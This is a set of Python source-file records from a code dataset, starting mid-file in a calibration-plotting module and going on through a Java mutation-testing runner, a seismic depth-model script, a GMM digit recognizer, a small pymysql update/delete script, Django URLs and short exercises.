func: a scipy.stats distribution\n df: a pandas DataFrame containing observations (x, y)\n point_estimate: either a mean or a median (default: {\"mean\"})\n interval: the width of the predictive interval (default: {0.95})\n title: an optional plot title (default: {None})\n legend: whether to show a legend (default: {True})\n ax: matplotlib axis to draw on, if any (default: {None})\n \"\"\"\n assert point_estimate in {\"mean\", \"median\"}, \"Point estimate must be either 'mean' or 'median'\"\n assert 0 <= interval <= 1\n\n x = np.linspace(df.x.min(), df.x.max(), num=1000)\n distribution = func(x)\n lower, upper = distribution.interval(interval)\n point_est = distribution.mean() if point_estimate == \"mean\" else distribution.median()\n\n ax = ax or plt.gca()\n ax.fill_between(\n x,\n lower,\n upper,\n color=COLORS[\"true\"],\n alpha=FILL_ALPHA,\n label=f\"True {interval*100:.0f}% Interval\",\n )\n ax.scatter(df.x, df.y, s=10, color=COLORS[\"observations\"], label=\"Observations\")\n ax.plot(x, point_est, color=COLORS[\"true\"], label=\"True Mean\")\n if title is not None:\n ax.set_title(title)\n if legend:\n ax.legend(bbox_to_anchor=(1.04, 1), borderaxespad=0)\n\n\ndef plot_posterior_predictive(\n x,\n post_pred,\n func=None,\n df=None,\n point_estimate=\"mean\",\n interval=0.95,\n title=None,\n legend=True,\n ax=None,\n):\n \"\"\"Plot the posterior predictive along with the observations and the true function\n\n Args:\n x: an array of X's of shape (N,), (N, 1) or (1, N)\n post_pred: the posterior predictive, array of shape (M, N),\n where M is the number of samples for each X (e.g. 1000)\n func: the true function, a scipy.stats distribution (default: {None})\n df: a pandas DataFrame of observations (x,y) (default: {None})\n point_estimate: either a mean of a median (default: {\"mean\"})\n interval: the width of the predictive interval (default: {0.95})\n title: an optional plot title (default: {None})\n legend: whether to show a legend (default: {True})\n ax: matplotlib axis to draw on, if any (default: {None})\n \"\"\"\n assert point_estimate in {\"mean\", \"median\"}, \"Point estimate must be either 'mean' or 'median'\"\n assert 0 <= interval <= 1\n\n ax = ax or plt.gca()\n\n if func is not None and df is not None:\n plot_true_function(\n func, df, point_estimate=point_estimate, interval=interval, legend=legend, ax=ax\n )\n\n x = x.ravel()\n lower, upper = np.percentile(post_pred, [2.5, 97.5], axis=0)\n point_est = post_pred.mean(axis=0) if point_estimate == \"mean\" else np.median(post_pred, axis=0)\n\n ax.fill_between(\n x,\n lower,\n upper,\n color=COLORS[\"predicted\"],\n alpha=FILL_ALPHA,\n label=f\"{interval*100:.0f}% Predictive Interval\",\n )\n ax.plot(x, point_est, color=COLORS[\"predicted\"], label=f\"Predicted Mean\")\n ax.set_title(title)\n if legend:\n ax.legend(bbox_to_anchor=(1.04, 1), borderaxespad=0)\n\n\ndef plot_illustration(ppc_func, df, conditionals=True, interval=0.95, title=None):\n \"\"\"Visualize the miscalibrated posterior predictive to illustrate\n the calibration algorithm.\n\n Used on the slide \"The Algorithm Step-by-Step\"\n\n Args:\n ppc_func: a scipy.stats distribution for the posterior predictive\n df: a pandas DataFrame of observations (x, y)\n conditionals: whether to plot the conditional densities (default: {True})\n interval: the width of the predictive interval (default: {0.95})\n title: an optional plot title (default: {None})\n \"\"\"\n # Plot the observations and the predictive interval\n assert 0 <= interval <= 1\n\n fig, ax = plt.subplots(1, 
1)\n x = np.linspace(df.x.min(), df.x.max(), num=1000)\n distribution = ppc_func(x)\n lower, upper = distribution.interval(interval)\n\n ax.fill_between(\n x,\n lower,\n upper,\n color=COLORS[\"predicted\"],\n alpha=FILL_ALPHA,\n label=f\"{interval*100:.0f}% Predictive Interval\",\n )\n ax.scatter(df.x, df.y, s=10, color=COLORS[\"observations\"], label=\"Observations\")\n ax.plot(x, distribution.mean(), color=COLORS[\"predicted\"], label=\"Predicted Mean\")\n ax.set(xlabel=\"X\", ylabel=\"Y\")\n if title is not None:\n ax.set_title(title)\n ax.legend(bbox_to_anchor=(1.04, 1), borderaxespad=0)\n ax.set_ylim([-12, 12])\n\n if not conditionals:\n return\n\n # Plot the conditional distribution of Y given X=x_0\n ax2 = fig.add_axes([0.2, 0.235, 0.075, 0.4])\n ax2.axison = False\n\n base = ax2.transData\n rot = transforms.Affine2D().rotate_deg(90)\n\n x_ = np.linspace(-3, 3, num=100)\n density = scipy.stats.norm(loc=0, scale=0.75)\n ax2.plot(x_, density.pdf(x_), transform=rot + base, color=\"tab:gray\")\n\n # Plot the conditional distribution of Y given X=x_1\n ax3 = fig.add_axes([0.5, 0.405, 0.075, 0.2])\n ax3.axison = False\n\n base = ax3.transData\n rot = transforms.Affine2D().rotate_deg(90)\n\n x_ = np.linspace(-3, 3, num=100)\n density = scipy.stats.norm(loc=0, scale=0.55)\n ax3.plot(x_, density.pdf(x_), transform=rot + base, color=\"tab:gray\")\n\n ax.annotate(\"$f(Y|x_0)$\", [-3.23, 4])\n ax.annotate(\"$f(Y|x_1)$\", [0.2, 3.5])\n\n\ndef plot_table(mark_y=False, show_quantiles=None):\n \"\"\"Display a table, accompaining the step-by-step illustration of the algorithm\n\n Args:\n mark_y: whether to draw dashed vertical lines for the location of y (default: {False})\n show_quantiles: the values of quantiles to display, \"predicted\" / \"all\" or None\n (default: {None})\n \"\"\"\n if show_quantiles == \"all\":\n table_params = {\"ncols\": 5, \"figsize\": (10, 4)}\n columns = [\n \"Observation\",\n \"PDF $f(Y|x_t)$\",\n \"CDF $H(x_t)$\",\n \"$H(x_t)(y_t)$\",\n r\"$\\hat{P}(p)$\",\n ]\n elif show_quantiles == \"predicted\":\n table_params = {\"ncols\": 4, \"figsize\": (8, 4)}\n columns = [\"Observation\", \"PDF $f(Y|x_t)$\", \"CDF $H(x_t)$\", \"$H(x_t)(y_t)$\"]\n else:\n table_params = {\"ncols\": 3, \"figsize\": (6, 4)}\n columns = [\"Observation\", \"PDF $f(Y|x_t)$\", \"CDF $H(x_t)$\"]\n\n fig, ax = plt.subplots(nrows=5, **table_params)\n\n for a in ax.flatten():\n a.set_xticklabels([])\n a.set_yticklabels([])\n a.set_xticks([])\n a.set_yticks([])\n a.margins(0.2)\n\n plt.subplots_adjust(wspace=0.0, hspace=0)\n\n for i, column in enumerate(columns):\n ax[0, i].set_title(column)\n\n rows = [\"$(x_0, y_0)$\", \"$(x_1, y_1)$\", r\"$\\ldots$\", r\"$\\ldots$\", \"$(x_t, y_t)$\"]\n for i, row in enumerate(rows):\n ax[i, 0].annotate(row, xy=[0.5, 0.5], size=15, ha=\"center\", va=\"center\")\n\n x_ = np.linspace(-3, 3, num=100)\n scales = [1, 0.5, 0.75, 1.25, 1.5]\n for i, std in enumerate(scales):\n ax[i, 1].plot(x_, scipy.stats.norm.pdf(x_, loc=0, scale=std))\n ax[i, 2].plot(x_, scipy.stats.norm.cdf(x_, loc=0, scale=std))\n\n # Illustrative predictive and empirical quantiles (obtained via isotonic regression)\n quantiles = [0.8, 0.8, 0.2, 0.4, 0.6]\n empirical = [0.638443, 0.638443, 0.3569105, 0.44220539, 0.56308756]\n\n if mark_y:\n for i, quantile in enumerate(quantiles):\n distribution = scipy.stats.norm(loc=0, scale=scales[i])\n value = distribution.ppf(quantile)\n ax[i, 1].plot([value] * 2, [0, distribution.pdf(value)], linestyle=\"--\")\n ax[i, 2].plot([value] * 2, [0, 
distribution.cdf(value)], linestyle=\"--\")\n\n if show_quantiles in [\"predicted\", \"all\"]:\n for i, quantile in enumerate(quantiles):\n ax[i, 3].annotate(quantile, xy=[0.5, 0.5], size=15, ha=\"center\", va=\"center\")\n\n if show_quantiles in [\"all\"]:\n for i, quantile in enumerate(empirical):\n ax[i, 4].annotate(f\"{quantile:.2f}\", xy=[0.5, 0.5], size=15, ha=\"center\", va=\"center\")\n\n ax4 = plt.gcf().add_axes([0.595, 0.59, 0.303, 0.28])\n ax4.axison = False\n ax4.add_patch(\n Rectangle(\n (0, 0.01),\n 0.99,\n 0.99,\n linewidth=1,\n linestyle=\"--\",\n edgecolor=\"tab:red\",\n facecolor=\"none\",\n )\n )\n\n\ndef plot_ecdf(predicted_quantiles):\n \"\"\"Visualize the empirical CDF\n\n Used in the step-by-step illustration of the calibration algorithm.\n\n Args:\n predicted_quantiles: the values of the quantiles for each observed Y\n \"\"\"\n plt.hist(predicted_quantiles, bins=50, cumulative=True, density=True, alpha=0.3)\n plt.title(\"CDF of Predicted Quantiles\")\n plt.xlabel(\"Predicted Quantiles, $H(x_t)(y_t)$\")\n plt.ylabel(r\"Empirical Quantiles, $\\hat{P}(p_t)$\")\n\n\ndef calibration_plot(predicted_quantiles, model, title=None):\n \"\"\"Visualize a calibration plot suggested by the authors\n\n Args:\n predicted_quantiles: the values of the quantiles for each Y in the dataset\n model: an isotonic regression object (trained in forward mode from predicted to empirical\n quantiles)\n \"\"\"\n # Choose equally spaced quantiles\n expected_quantiles = np.linspace(0, 1, num=11).reshape(-1, 1)\n\n # Compute the probabilities of predicted quantiles at the discrete quantile levels\n T = predicted_quantiles.shape[0]\n observed_uncalibrated = (predicted_quantiles.reshape(1, -1) <= expected_quantiles).sum(\n axis=1\n ) / T\n\n # Use the model to output the actual probabilities of any quantile\n calibrated_quantiles = model.predict(predicted_quantiles)\n # Estimate the observed calibrated quantiles\n observed_calibrated = (calibrated_quantiles.reshape(1, -1) <= expected_quantiles).sum(\n axis=1\n ) / T\n\n # Plot the results\n plt.plot(\n expected_quantiles,\n observed_uncalibrated,\n marker=\"o\",\n color=COLORS[\"predicted\"],\n label=\"Uncalibrated\",\n )\n plt.plot(\n expected_quantiles,\n observed_calibrated,\n marker=\"o\",\n color=COLORS[\"calibrated\"],\n label=\"Calibrated\",\n )\n plt.plot([0, 1], [0, 1], color=\"tab:grey\", linestyle=\"--\", zorder=0)\n plt.title(title or \"Calibration Plot\")\n plt.xlabel(\"Expected Quantiles\")\n plt.ylabel(\"Observed Quantiles\")\n plt.legend()\n\n\ndef plot_calibration_results(\n result, qc, func, interval=0.95, figsize=(8.5, 3.5), point_est=\"median\"\n):\n \"\"\"Plot the posterior predictive before and after calibration\n\n Args:\n result: a result diction returned by calibrate()\n qc: a fitted QuantileCalibration object\n df: a pandas DataFrame of observations (x, y)\n func: the true function, a scipy.stats distribution\n interval: the width of the predictive interval (default: {0.95})\n figsize: the overall size of the matplotlib figure, which will be split in\n two subplots (default: {(8.5, 3.5)})\n point_est: indicate whether to use mean or median as the point estimate\n \"\"\"\n assert point_est in {\"mean\", \"median\"}, \"Point estimate must be either 'mean' or 'median'\"\n\n x = result[\"X_test\"].ravel()\n post_pred = result[\"post_pred\"]\n if point_est == \"mean\":\n calibrated_post_pred = calibrate_posterior_predictive(result[\"post_pred\"], qc)\n post_pred_x = result[\"post_pred_x\"]\n\n df = result[\"df\"]\n\n assert 0 <= 
interval <= 1\n q_alpha = (1 - interval) / 2\n low, high = q_alpha, 1 - q_alpha\n q = [low, 0.5, high]\n quantiles = [q, qc.inverse_transform(q)]\n titles = [\"Before Calibration\", \"After Calibration\"]\n\n fig, ax = plt.subplots(1, 2, figsize=figsize, sharex=True, sharey=True)\n\n for i, axis in enumerate(ax):\n # Plot the true function\n distribution = func(x)\n lower, upper = distribution.interval(interval)\n true_interval = axis.fill_between(\n x,\n lower,\n upper,\n color=COLORS[\"true\"],\n alpha=FILL_ALPHA,\n label=f\"True {interval*100:.0f}% Interval\",\n )\n axis.scatter(df.x, df.y, s=3, color=COLORS[\"observations\"], label=\"Observations\")\n if point_est == \"mean\":\n point_est_value = distribution.mean()\n true_label = \"True Mean\"\n else:\n point_est_value = distribution.median()\n true_label = \"True Median\"\n true_point_est = axis.plot(x, point_est_value, color=COLORS[\"true\"], label=true_label)\n axis.set_title(titles[i])\n\n lower, median, upper = np.quantile(post_pred, quantiles[i], axis=0)\n predicted_interval = axis.fill_between(\n x,\n lower,\n upper,\n color=COLORS[\"predicted\"],\n alpha=FILL_ALPHA,\n label=f\"{interval*100:.0f}% Predictive Interval\",\n )\n if point_est == \"mean\":\n mean = np.mean(calibrated_post_pred, axis=0)\n predicted_point_est = axis.plot(\n x, mean, color=COLORS[\"predicted\"], label=f\"Predicted Mean\"\n )\n else:\n predicted_point_est = axis.plot(\n x, median, color=COLORS[\"predicted\"], label=f\"Predicted Median\"\n )\n\n # Compute the calibration error and PICP, before calibration\n uncalibrated_quantiles = calculate_quantiles(post_pred_x.T, df[[\"y\"]].values)\n cal_error = calibration_error(uncalibrated_quantiles)\n picp_value = picp(uncalibrated_quantiles, interval=interval)\n\n ax[0].text(\n 0.96,\n 0.06,\n f\"Calibr. {cal_error:.3f}\\nPICP {picp_value:.3f}\",\n horizontalalignment=\"right\",\n transform=ax[0].transAxes,\n )\n # After calibration:\n calibrated_quantiles = qc.transform(uncalibrated_quantiles)\n cal_error = calibration_error(calibrated_quantiles)\n picp_value = picp(calibrated_quantiles, interval=interval)\n\n ax[1].text(\n 0.96,\n 0.06,\n f\"Calibr. {cal_error:.3f}\\nPICP {picp_value:.3f}\",\n horizontalalignment=\"right\",\n transform=ax[1].transAxes,\n )\n\n # Add a legend under the plots\n handles = [true_interval, true_point_est[0], predicted_interval, predicted_point_est[0]]\n labels = [h.get_label() for h in handles]\n fig.legend(handles, labels, loc=\"lower center\", ncol=len(labels))\n fig.tight_layout(rect=(0, 0.1, 1, 1))\n\n\ndef check_convergence(res_main, res_holdout, func, plot=True, point_estimate=\"median\"):\n \"\"\"Print basic diagnostic metrics for each trained dataset and optionally plot the\n posterior predictives for visual checks.\n\n The diagnostic metrics are the Effective Sample Size and the Gelman-Rubin test. These\n are only available for posteriors obtained via sampling. For VI posteriors one needs\n to perform a visual check.\n\n Args:\n res_main: a dictionary of fitted objects for the main dataset (model, inference\n object, the posterior predictive, etc.)\n res_holdout: a similar dictionary of fitted objects for the hold-out dataset\n func: the true function, a scipy.stats distribution\n plot: whether to plot the posterior predictives.
If set to False, only textual\n information will be printed, if available (default: {True})\n point_estimate: either a median or a mean (default: {\"median\"})\n \"\"\"\n assert point_estimate in {\"mean\", \"median\"}, \"Point estimate must be either 'mean' or 'median'\"\n\n data = {\"Main dataset\": res_main, \"Hold-out dataset\": res_holdout}\n\n for name, res in data.items():\n if isinstance(res[\"infer\"], MCMC):\n # Compute basic diagnostic tests for an MCMC model\n diagnostics = run_diagnostics(res[\"infer\"])\n else:\n diagnostics = None\n\n if plot:\n plt.figure()\n plot_posterior_predictive(\n res[\"X_test\"],\n res[\"post_pred\"],\n func=func,\n df=res[\"df\"],\n title=name,\n point_estimate=point_estimate,\n )\n\n # Print the results of diagnostic tests\n if diagnostics:\n message = (\"Minimum ESS: {min_ess:,.2f}\\nMax Gelman-Rubin: {max_rhat:.2f}\").format(\n **diagnostics\n )\n plt.gcf().text(0.95, 0.15, message)\n else:\n if diagnostics:\n print(\n \"{name}: minimum ESS {min_ess:,.2f}, \"\n \"maximum Gelman-Rubin {max_rhat:.2f}\".format(name=name, **diagnostics)\n )\n\n\ndef plot_calibration_slice(result, slice_locations, qc, figsize=(8.5, 3.5)):\n \"\"\"Plots calibrated vs uncalibrated posterior predictive cross-sections.\n\n Args:\n result: a result diction returned by calibrate()\n slice_locations: numpy array, quantiles of X_test values at which to draw cross-sections\n qc: a fitted QuantileCalibration object\n \"\"\"\n\n cal_post_pred = calibrate_posterior_predictive(result[\"post_pred\"], qc)\n slices = np.floor(cal_post_pred.shape[1] * slice_locations).astype(int)\n\n uncal_lower_limit = np.min(\n np.apply_along_axis(lambda x: np.quantile(x, 0.02), 0, result[\"post_pred\"][:, slices])\n )\n cal_lower_limit = np.min(\n np.apply_along_axis(lambda x: np.quantile(x, 0.02), 0, cal_post_pred[:, slices])\n )\n lower_limit = min(uncal_lower_limit, cal_lower_limit)\n\n uncal_upper_limit = np.max(\n np.apply_along_axis(lambda x: np.quantile(x, 0.98), 0, result[\"post_pred\"][:, slices])\n )\n cal_upper_limit = np.max(\n np.apply_along_axis(lambda x: np.quantile(x, 0.98), 0, cal_post_pred[:, slices])\n )\n upper_limit = max(uncal_upper_limit, cal_upper_limit)\n\n x_values = result[\"X_test\"][slices]\n\n fig, ax = plt.subplots(1, 2, figsize=figsize, sharey=True, tight_layout=True)\n for idx in range(len(slices)):\n pp_df = pd.DataFrame(\n {\n \"Uncalibrated\": result[\"post_pred\"][:, slices[idx]],\n \"Calibrated\": cal_post_pred[:, slices[idx]],\n }\n )\n pp_df.plot.kde(\n ax=ax[idx],\n xlim=(lower_limit, upper_limit),\n color=[COLORS[\"predicted\"], COLORS[\"calibrated\"]],\n )\n ax[idx].set_title(f\"Posterior Predictive at $X={x_values[idx][0]:.2f}$\")\n ax[idx].set_xlabel(\"Y\")\n","sub_path":"report/code/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":19208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"313826734","text":"#!/usr/bin/env python3\n\nimport os\nimport argparse\nimport subprocess\nfrom parsers.javaParser import JavaParser\nfrom operators.javaOperators import LCR, AOR, ROR, ABS, UOI\n\ncompiler = 'javac'\nmutantsDirectory = 'mutants/'\noriginalBupFile = '_original.bup'\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('sourceFilePath', help='path to the java source file for which we need to generate mutants')\n parser.add_argument('sourcePackagePath', help='path to the java package that contains the src file')\n 
parser.add_argument('testFilePath', help='path to the JUnit test file for the provided source file')\n parser.add_argument('testPackagePath', help='path to the java package that contains the provided test file')\n args = parser.parse_args()\n\n sourceFilePath = args.sourceFilePath[0] == '/' and args.sourceFilePath or os.path.join(os.getcwd(), args.sourceFilePath)\n sourcePackagePath = args.sourcePackagePath[0] == '/' and args.sourcePackagePath or os.path.join(os.getcwd(), args.sourcePackagePath)\n testFilePath = args.testFilePath[0] == '/' and args.testFilePath or os.path.join(os.getcwd(), args.testFilePath)\n testPackagePath = args.testPackagePath[0] == '/' and args.testPackagePath or os.path.join(os.getcwd(), args.testPackagePath)\n\n # setup classpath\n classpath = [sourcePackagePath, testPackagePath]\n\n junitLocation = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'junit/')\n for file in os.listdir(junitLocation):\n classpath.append(junitLocation + file)\n\n classpath = ':'.join(classpath)\n\n # mute all the irrelevant stuff\n with open(os.devnull, 'wb') as devnull:\n # check initial test and source files\n try:\n print('compiling source and test files...')\n\n if subprocess.call([compiler, sourceFilePath, '-cp', classpath], stdout=devnull):\n raise Exception('source file cannot be compiled, fix the code first')\n\n if subprocess.call([compiler, testFilePath, '-cp', classpath], stdout=devnull):\n raise Exception('test file cannot be compiled, fix the code first')\n \n print('compilation successful')\n except Exception as e:\n print(e.args[0])\n exit(1)\n\n # generate mutants\n sourceFileDir, sourceFileName = os.path.split(sourceFilePath)\n os.chdir(sourceFileDir)\n\n if not os.path.exists(mutantsDirectory):\n os.makedirs(mutantsDirectory)\n elif os.listdir(mutantsDirectory):\n print('Directory with mutants not empty. 
Please, remove old mutants first')\n exit(1)\n\n fileParser = JavaParser()\n parsedFile = fileParser.parse(sourceFileName)\n\n print('---------------------')\n print('creating mutants...')\n for operator in [AOR, LCR, ROR, ABS, UOI]:\n operator(sourceFileName, parsedFile)\n\n # run tests on mutants\n testFileDir, testFileName = os.path.split(testFilePath)\n bareTestFileName, testFileExt = os.path.splitext(testFileName)\n\n os.rename(sourceFileName, originalBupFile)\n\n killedMutants = []\n notKilledMutants = []\n invalidMutants = []\n\n for mutantFile in os.listdir(mutantsDirectory):\n print('---------------------')\n print('processing mutant {0}'.format(mutantFile))\n \n subprocess.call(['mv', mutantsDirectory + mutantFile, sourceFileName], stdout=devnull)\n \n if subprocess.call([compiler, sourceFilePath, '-cp', classpath], stdout=devnull, stderr=devnull) == 0:\n print(' mutant valid, testing...')\n testClassName = parsedFile['package'] and '.'.join([parsedFile['package'], bareTestFileName]) or bareTestFileName\n\n if subprocess.call(['java', '-cp', classpath, 'org.junit.runner.JUnitCore', testClassName], stdout=devnull):\n print(' mutant killed')\n killedMutants.append(mutantFile)\n else:\n print(' mutant not killed or equivalent')\n notKilledMutants.append(mutantFile)\n else: # invalid mutant\n print(' mutant invalid, discarding')\n invalidMutants.append(mutantFile)\n \n subprocess.call(['mv', sourceFileName, mutantsDirectory + mutantFile], stdout=devnull)\n\n os.rename(originalBupFile, sourceFileName)\n \n # results\n mutationScore = len(killedMutants) * 100 / (len(killedMutants) + len(notKilledMutants))\n print('=====================')\n print('killed mutants: {0}\\n{1}'.format(len(killedMutants), '\\n'.join([' {0}'.format(a) for a in killedMutants])))\n print('not killed mutants: {0}\\n{1}'.format(len(notKilledMutants), '\\n'.join([' {0}'.format(a) for a in notKilledMutants])))\n print('invalid mutants: {0}\\n{1}'.format(len(invalidMutants), '\\n'.join([' {0}'.format(a) for a in invalidMutants])))\n print('---------------------')\n print('mutation score: {0}%'.format(mutationScore))","sub_path":"jMutagen.py","file_name":"jMutagen.py","file_ext":"py","file_size_in_byte":5135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"62661632","text":"from __future__ import print_function\nfrom srfpython import *\n\n# -----------------------\n# create 1-D depth model using 4 arrays with same length\n# -----------------------\n# top layers array first at 0, positive, growing, km\nztop = np.linspace(0., 2.8, 50)\n\n# vs in km/s\nvs = (3.5 - .86) / (ztop[-1] - ztop[0]) * (ztop - 0.) + .86 + \\\n -.7 * np.exp(-ztop / .1) + \\\n .08 * np.cos(2. * np.pi * ztop / .5) + \\\n .2 * np.sin(2. * np.pi * ztop / 1.) + \\\n .1 * np.cos(2. * np.pi * ztop / 2.) + \\\n .15 * np.cos(2. 
* np.pi * ztop / 3.)\n\nvp, rh = brocher2005(vs)\n\n# create the depthmodel object, use a subclass that is to be intitiated with arrays\n# see also depthmodel, depthmodel1D, depthmodel_from_mod96, ...\ndm = depthmodel_from_arrays(ztop, vp, vs, rh)\n\n# __str__ returns the file content at mod96 format, (see Herrmann CPS documentation)\nprint(dm)\n\ndm.write96('model000.mod96')\n","sub_path":"tutorials/00_simple_dispersion_example/01_using_python_programs/000_create_dephmodel.py","file_name":"000_create_dephmodel.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"543864659","text":"import glob\nimport numpy as np\nimport sklearn.model_selection\nimport datetime\n\nfrom Classes.Analyzer import *\n\n\ndef flatten(iterable):\n return [y for x in iterable for y in x]\n\n\ndef get_train_files():\n \"\"\" Get list of wav files in the train directory \"\"\"\n return glob.glob('../train/*.wav')\n\n\ndef get_eval_files():\n return glob.glob('../eval/*.wav')\n\n\ndef get_speaker_data(files):\n \"\"\" Get speaker data \"\"\"\n speaker_data = {}\n\n for file in files:\n info = FileInfo(file)\n param = FileParameters(info)\n\n if param.get_speaker() not in speaker_data:\n speaker_data[param.get_speaker()] = []\n\n speaker_data[param.get_speaker()].append(param)\n\n return speaker_data\n\n\ndef get_gmm_models(data, cross_validation=True):\n \"\"\" Get GMM models for each of numbers \"\"\"\n\n if cross_validation:\n kf = sklearn.model_selection.KFold(n_splits=len(data) // 2)\n\n all_models = []\n all_tests_data = []\n\n for train_idx, test_idx in kf.split(data):\n train_data = []\n for idx in train_idx:\n train_data.append(data[list(data.keys())[idx]])\n\n test_data = []\n for idx in test_idx:\n test_data.append(data[list(data.keys())[idx]])\n\n train_data = flatten(train_data)\n test_data = flatten(test_data)\n\n all_tests_data.append(test_data)\n\n models = []\n for i in range(10):\n combined_mfcc = None\n current_num_params = list(filter(lambda p: p.get_rec_num() == i, train_data))\n\n for param in current_num_params:\n if combined_mfcc is None:\n combined_mfcc = param.mfcc\n else:\n combined_mfcc = np.concatenate((combined_mfcc, param.mfcc))\n\n models.append(GmmModel(combined_mfcc, i))\n\n all_models.append(models)\n\n return all_models, all_tests_data\n else:\n models = []\n\n train_data = flatten(data.values())\n\n for i in range(10):\n combined_mfcc = None\n current_num_params = list(filter(lambda p: p.get_rec_num() == i, train_data))\n\n for param in current_num_params:\n if combined_mfcc is None:\n combined_mfcc = param.mfcc\n else:\n combined_mfcc = np.concatenate((combined_mfcc, param.mfcc))\n\n models.append(GmmModel(combined_mfcc, i))\n\n return models\n\n\ndef get_recognition_ratio(all_models, all_tests, suffix=''):\n results_file = open('../results/results_{}{}.txt'.format(datetime.datetime.now().strftime(\"%H_%M_%S\"), suffix), 'w+')\n results_file.truncate(0)\n\n all_count = sum([len(x) for x in all_tests])\n correct_count = 0\n\n for models, tests in zip(all_models, all_tests):\n for entry in tests:\n logs = []\n nums = []\n\n for model in models:\n logs.append(model.gmm.score(entry.mfcc))\n nums.append(model.number)\n\n idx = logs.index(max(logs))\n\n if nums[idx] == entry.get_rec_num():\n correct_count += 1\n\n results_file.write('{},{},{:.2f}\\n'.format(entry.file_info.file_name[9:], nums[idx], max(logs)))\n\n rr = correct_count / all_count\n\n results_file.write('RR: 
{:.2f}'.format(rr))\n print(rr)\n results_file.close()\n\n return rr\n\n\ndef recognize(models, tests):\n results_file = open('../results/results_with_tests_{}.txt'.format(datetime.datetime.now().strftime(\"%H_%M_%S\")), 'w+')\n results_file.truncate(0)\n\n for test in tests:\n logs = []\n nums = []\n\n for model in models:\n logs.append(model.gmm.score(test.mfcc))\n nums.append(model.number)\n\n idx = logs.index(max(logs))\n results_file.write('{},{},{:.2f}\\n'.format(test.file_info.file_name[8:], nums[idx], max(logs)))\n\n results_file.close()\n\n\ndef main():\n # files = get_train_files()\n # eval_files = get_eval_files()\n # speaker_data = get_speaker_data(files)\n # # all_models, all_tests_data = get_gmm_models(speaker_data) # Models for all of the numbers from (0-9)\n # # get_recognition_ratio(all_models, all_tests_data, '_cov_spherical')\n #\n # models = get_gmm_models(speaker_data, cross_validation=False)\n # tests = get_speaker_data(eval_files)\n # print('dupa')\n # recognize(models, flatten(tests.values()))\n\n # Testing\n\n from eval import evaluate\n\n\n files = get_train_files()\n eval_files = get_eval_files()\n speaker_data = get_speaker_data(files)\n all_models, all_tests_data = get_gmm_models(speaker_data)\n models = get_gmm_models(speaker_data, cross_validation=False)\n tests = get_speaker_data(eval_files)\n #recognize(models, flatten(tests.values()))\n evaluate('dupa.txt')\n\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Projekt 01/scripts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"206988122","text":"def square(number):\n return number * number\n\nsq=square\nprint(sq(2))\nliste=[2,4,5,6,7,8,9]\nnewList =[sq(i)for i in liste]\nprint(newList)\nnumberssq = list(map(square,liste))\nprint(numberssq)\ndef fact(number):\n if number <=1:\n return 1\n else:\n return number*fact(number-1)\n\nnumberfact = list(map(fact,liste))\nprint(numberfact)","sub_path":"More On Functions.py","file_name":"More On Functions.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"37351181","text":"#!D:\\PYTHON37\\python.exe\n\n\nimport pymysql\n\ndb = pymysql.connect(\"localhost\",\"root\", \"\", \"pythondb\")\n\ncursor = db.cursor()\n\n##Update\n##sql = \"UPDATE TestTable SET Age = 30 WHERE Name = 'Bob'\"\n\n##Deletion\nsql = \"DELETE FROM TestTable WHERE Name = 'Bob'\"\n\ntry:\n cursor.execute(sql)\n\n db.commit()\nexcept:\n db.rollback()\n\n\n \n\ndb.close()\n","sub_path":"database-update.py","file_name":"database-update.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"539911533","text":"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.conf.urls import handler404\nfrom blog import views\n\nhandler404 = views.handler404\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('',views.home),\n path('about/',views.about,name='about'),\n path('contact/',views.contact,name='contact'),\n path('login/',views.user_login,name='login'),\n path('logout/',views.user_logout,name='logout'),\n path('dashboard/',views.dashboard,name='dashboard'),\n path('signup/',views.user_signup,name='signup'),\n path('addpost/',views.add_post,name = 'addpost'),\n path('updatepost//',views.update_post,name= 'updatepost'),\n path('delete//',views.delete_post,name 
= 'deletepost'),\n]\n","sub_path":"miniblog/miniblog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"431334665","text":"# Write a program that asks the user to enter \n# an integer and determines whether that number is even or odd, \n# and whether the entered data is valid.\n\n# try:\n# num = int(input('Enter your number: '))\n# except ValueError:\n# print('You entered the wrong data.')\n\n# if num%2 == 0:\n# print('Even')\n# else:\n# print('Odd')\n\n##################################@@@@@@@@@@@@@@@@@@@##########\nn = input('Enter your number: ')\nwhile type(n) != int:\n try:\n n = int(n)\n except ValueError:\n print('\\n You entered the wrong data.\\n')\n n = input('Enter your number: ')\n\nif n%2 == 0:\n print('Even')\nelse:\n print('Odd')\n#################################################################\n# class NegValException(Exception):\n# pass\n\n# try:\n# val = int(input(\"input positive number: \"))\n# if val < 0:\n# raise NegValException(\"Neg val: \" + str(val))\n# print(val + 10)\n# except NegValException as e:\n# print(e)\n\n# try:\n# val = int(input(\"input number: \"))\n# tmp = 10 / val\n# print(tmp)\n# except:\n# print(\"Exception\")\n# finally:\n# print(\"Finally code\")","sub_path":"Home_work/9_1.py","file_name":"9_1.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"231014189","text":"from cmu_112_graphics import *\nimport basic_graphics, time, random\nimport objects, frames, message, play, astar, disaster\nfrom dataclasses import make_dataclass\n\n# meso is the main file for running the game\n\n# GENERAL CITATIONS\n# color names from http://www.science.smith.edu/dftwiki/index.php/Color_Charts_for_TKinter\n# cmu 112 graphics from 